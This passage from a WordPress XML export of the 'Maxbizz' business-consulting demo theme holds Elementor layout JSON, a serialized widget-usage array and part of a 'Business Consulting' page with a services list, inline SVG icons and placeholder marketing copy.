		<wp:meta_value><![CDATA[[{"id":"41c2f83","elType":"section","settings":{"padding":{"unit":"px","top":"90","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"99e32eb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"bbf118c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/slider2-home2.jpg","id":1317},"background_position":"center center","background_position_mobile":"center left","background_repeat":"no-repeat","background_size":"cover","background_size_tablet":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"100","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"60","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"5e47caf","elType":"column","settings":{"_column_size":50,"_inline_size":44.63600000000000278532752417959272861480712890625,"_inline_size_tablet":70,"_inline_size_mobile":100},"elements":[{"id":"4376d3b","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e1f3f6","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h1","title_color":"#1B1D21","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bb56b1a","elType":"widget","settings":{"btn_style":"dark","text":"get in touch"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"a57cea8","elType":"column","settings":{"_column_size":50,"_inline_size":55.36399999999999721467247582040727138519287109375,"_inline_size_tablet":30,"_inline_size_mobile":100},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"c25f6a6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"95","right":"0","bottom":"130","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2385c34","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"b25f0cc","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"cf25bf5","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"cab9896"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"d505a0a"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"5303f19"}],"_padding":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"018e51c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9b39923","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"-30","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a1952ca","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-service-detail2.jpg","id":970},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"ec49fa5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1b5272a","elType":"widget","settings":{"sub":"our benefits","title":"Why Clients Choose Us","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"},{"id":"2d7dbb6","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"d6df67f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"80fa6cf","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#4B83FC","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#4B83FC1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"a9e257f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4ea034c","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#4B83FC","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#4B83FC1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"f4ad5a2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"70ad7d9","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#4B83FC","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#4B83FC1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2b09e55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a5a983f","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"bg_box":"#FFFFFF","bg_hover_box":"#4B83FC","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#4B83FC1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d701907","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"52","right":"0","bottom":"55","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"b3a944d","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"4c35005","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"cab11a6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"27d6af4","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"12e765f","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"f7ba0c1","elType":"section","settings":{"structure":"20","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"gap":"extended","content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cae27a3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cafb16e","elType":"widget","settings":{"sub":"reliable & safe","title":"Our Strategy Development","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"stitle_bg":"#4B83FC1A"},"elements":[],"widgetType":"iheading"},{"id":"ce3460e","elType":"widget","settings":{"ot_tabs":[{"tab_title":"Research","tab_content":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"ee4235d"},{"tab_title":"aproach","tab_content":"<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"768bb7a"},{"tab_title":"result","tab_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"3a5c920"}],"title_space":{"unit":"px","size":0,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"40","bottom":"40","left":"0","isLinked":false},"title_width_mobile":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"itabs"},{"id":"6e6c83a","elType":"widget","settings":{"btn_style":"dark","text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false},{"id":"70eb409","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"db0c981","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"padding":{"unit":"px","top":"50","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"7540ef2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d0b9d6d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home2.png","id":1485},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:1;s:27:"typography_font_size_mobile";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:5:{s:9:"btn_style";i:2;s:4:"text";i:3;s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:15;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:15;s:19:"_inline_size_tablet";i:10;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:3;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:5;s:16:"content_position";i:3;}s:17:"section_structure";a:1:{s:9:"structure";i:5;}}s:5:"style";a:2:{s:18:"section_background";a:8:{s:21:"background_background";i:4;s:16:"background_image";i:3;s:19:"background_position";i:3;s:26:"background_position_mobile";i:1;s:17:"background_repeat";i:3;s:15:"background_size";i:3;s:22:"background_size_tablet";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:7;s:14:"padding_tablet";i:2;s:14:"padding_mobile";i:5;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:11:"title_color";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:2;s:10:"image_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:4;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"align";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;s:8:"btn_text";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:8:{s:7:"is_line";i:4;s:11:"box_padding";i:4;s:16:"bg_hover_icon_bg";i:4;s:18:"bg_hover_des_color";i:4;s:6:"bg_box";i:4;s:12:"bg_hover_box";i:4;s:19:"bg_hover_icon_color";i:4;s:23:"bg_hover_link_btn_color";i:4;}s:18:"style_icon_section";a:5:{s:9:"is_border";i:4;s:10:"icon_space";i:4;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;s:7:"icon_bg";i:4;}s:21:"style_content_section";a:7:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_weight";i:1;s:9:"des_color";i:4;s:25:"des_typography_typography";i:4;s:26:"des_typography_font_family";i:4;s:24:"des_typography_font_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:5:"itabs";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_tabs";i:1;}}s:5:"style";a:1:{s:11:"style_title";a:2:{s:11:"title_space";i:1;s:18:"title_width_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consulting</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/</link>
		<pubDate>Thu, 17 Sep 2020 08:25:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=977</guid>
		<description></description>
		<content:encoded><![CDATA[<h5>Services</h5>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h5>Brochures</h5>		
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg" alt="" loading="lazy" />								</a>
			<h3>Strategic & Tactical Planning</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 